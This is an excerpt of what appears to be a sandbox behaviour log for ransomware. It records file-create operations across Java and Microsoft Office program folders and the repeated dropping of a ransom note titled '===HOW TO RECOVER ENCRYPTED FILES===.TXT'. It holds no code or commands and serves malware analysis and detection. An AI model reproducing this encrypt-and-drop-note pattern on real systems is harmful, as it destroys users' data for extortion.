| Create | C:\Program Files\Java\jre1.8.0_144\lib\management\jmxremote.access | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Java\jre1.8.0_144\lib\management\===HOW TO RECOVER ENCRYPTED FILES===.TXT | desired_access = GENERIC_WRITE, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_144\lib\management\jmxremote.password.template | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Java\jre1.8.0_144\lib\management\management.properties | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Java\jre1.8.0_144\lib\management\snmp.acl.template | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Java\jre1.8.0_144\lib\security\blacklist | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Java\jre1.8.0_144\lib\security\===HOW TO RECOVER ENCRYPTED FILES===.TXT | desired_access = GENERIC_WRITE, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_144\lib\security\blacklisted.certs | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Java\jre1.8.0_144\lib\security\cacerts | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Java\jre1.8.0_144\lib\security\java.policy | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Java\jre1.8.0_144\lib\security\java.security | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Java\jre1.8.0_144\lib\security\javaws.policy | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Java\jre1.8.0_144\lib\security\local_policy.jar | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Java\jre1.8.0_144\lib\security\trusted.libraries | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_144\lib\security\US_export_policy.jar | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\AppXManifest.xml | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\===HOW TO RECOVER ENCRYPTED FILES===.TXT | desired_access = GENERIC_WRITE, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | C:\Program Files\Microsoft Office\FileSystemMetadata.xml | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\Office16\OSPP.HTM | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\Office16\===HOW TO RECOVER ENCRYPTED FILES===.TXT | desired_access = GENERIC_WRITE, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | C:\Program Files\Microsoft Office\Office16\OSPP.VBS | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\Office16\SLERROR.XML | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\PackageManifests\AppXManifest.90160000-0015-0000-1000-0000000FF1CE.xml | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\PackageManifests\===HOW TO RECOVER ENCRYPTED FILES===.TXT | desired_access = GENERIC_WRITE, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | C:\Program Files\Microsoft Office\PackageManifests\AppXManifest.90160000-0015-0409-1000-0000000FF1CE.xml | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\PackageManifests\AppXManifest.90160000-0016-0000-1000-0000000FF1CE.xml | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\PackageManifests\AppXManifest.90160000-0016-0409-1000-0000000FF1CE.xml | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\PackageManifests\AppXManifest.90160000-0018-0000-1000-0000000FF1CE.xml | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\PackageManifests\AppXManifest.90160000-0018-0409-1000-0000000FF1CE.xml | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\PackageManifests\AppXManifest.90160000-0019-0000-1000-0000000FF1CE.xml | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\PackageManifests\AppXManifest.90160000-0019-0409-1000-0000000FF1CE.xml | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\PackageManifests\AppXManifest.90160000-001A-0000-1000-0000000FF1CE.xml | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\PackageManifests\AppXManifest.90160000-001A-0409-1000-0000000FF1CE.xml | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\PackageManifests\AppXManifest.90160000-001B-0000-1000-0000000FF1CE.xml | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\PackageManifests\AppXManifest.90160000-001B-0409-1000-0000000FF1CE.xml | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\PackageManifests\AppXManifest.90160000-001F-0409-1000-0000000FF1CE.xml | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\PackageManifests\AppXManifest.90160000-001F-040C-1000-0000000FF1CE.xml | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\PackageManifests\AppXManifest.90160000-001F-0C0A-1000-0000000FF1CE.xml | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\PackageManifests\AppXManifest.90160000-0027-0000-1000-0000000FF1CE.xml | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\PackageManifests\AppXManifest.90160000-002C-0409-1000-0000000FF1CE.xml | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\PackageManifests\AppXManifest.90160000-0054-0409-1000-0000000FF1CE.xml | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\PackageManifests\AppXManifest.90160000-0057-0000-1000-0000000FF1CE.xml | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\PackageManifests\AppXManifest.90160000-006E-0409-1000-0000000FF1CE.xml | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\PackageManifests\AppXManifest.90160000-0090-0000-1000-0000000FF1CE.xml | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\PackageManifests\AppXManifest.90160000-0090-0409-1000-0000000FF1CE.xml | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\PackageManifests\AppXManifest.90160000-00A1-0000-1000-0000000FF1CE.xml | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\PackageManifests\AppXManifest.90160000-00A1-0409-1000-0000000FF1CE.xml | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\PackageManifests\AppXManifest.90160000-00B4-0409-1000-0000000FF1CE.xml | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\PackageManifests\AppXManifest.90160000-00BA-0000-1000-0000000FF1CE.xml | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\PackageManifests\AppXManifest.90160000-00BA-0409-1000-0000000FF1CE.xml | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\PackageManifests\AppXManifest.90160000-00C1-0000-1000-0000000FF1CE.xml | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\PackageManifests\AppXManifest.90160000-00C1-0409-1000-0000000FF1CE.xml | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\PackageManifests\AppXManifest.90160000-00E1-0000-1000-0000000FF1CE.xml | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\PackageManifests\AppXManifest.90160000-00E1-0409-1000-0000000FF1CE.xml | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\PackageManifests\AppXManifest.90160000-00E2-0000-1000-0000000FF1CE.xml | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\PackageManifests\AppXManifest.90160000-00E2-0409-1000-0000000FF1CE.xml | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\PackageManifests\AppXManifest.90160000-0115-0409-1000-0000000FF1CE.xml | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\PackageManifests\AppXManifest.90160000-0117-0409-1000-0000000FF1CE.xml | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\PackageManifests\AppXManifest.90160000-012A-0000-1000-0000000FF1CE.xml | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\PackageManifests\AppXManifest.90160000-012B-0409-1000-0000000FF1CE.xml | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\PackageManifests\AppXManifest.90160000-3101-0000-1000-0000000FF1CE.xml | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\PackageManifests\AppXManifest.common.xml | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\PackageManifests\AppXManifestLoc.en-us.xml | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\PackageManifests\AuthoredExtensions.xml | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\AG00004_.GIF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\===HOW TO RECOVER ENCRYPTED FILES===.TXT | desired_access = GENERIC_WRITE, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\AG00011_.GIF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\AG00021_.GIF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\AG00037_.GIF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\AG00038_.GIF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\AG00040_.GIF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\AG00052_.GIF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\AG00057_.GIF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\AG00090_.GIF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\AG00092_.GIF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\AG00103_.GIF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\AG00120_.GIF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\AG00126_.GIF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\AG00129_.GIF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\AG00130_.GIF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\AG00135_.GIF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\AG00139_.GIF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\AG00142_.GIF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\AG00154_.GIF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\AG00157_.GIF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\AG00158_.GIF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\AG00160_.GIF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\AG00161_.GIF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\AG00163_.GIF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\AG00164_.GIF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\AG00165_.GIF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\AG00167_.GIF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\AG00169_.GIF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\AG00170_.GIF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\AG00171_.GIF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\AG00172_.GIF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\AG00174_.GIF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\AG00175_.GIF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\AG00176_.GIF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\AN00010_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\AN00015_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\AN00790_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\AN00853_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\AN00914_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\AN00932_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\AN00965_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\AN01039_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\AN01044_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\AN01060_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\AN01084_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\AN01173_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\AN01174_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\AN01184_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\AN01216_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\AN01218_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\AN01251_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\AN01545_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\AN02122_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\AN02559_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\AN02724_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\AN03500_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\AN04108_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\AN04117_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\AN04134_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\AN04174_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\AN04191_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\AN04195_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\AN04196_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\AN04206_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\AN04225_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\AN04235_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\AN04267_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\AN04269_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\AN04323_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\AN04326_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\AN04332_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\AN04355_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\AN04369_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\AN04384_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\AN04385_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\root\CLIPART\PUB60COR\BABY_01.MID | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
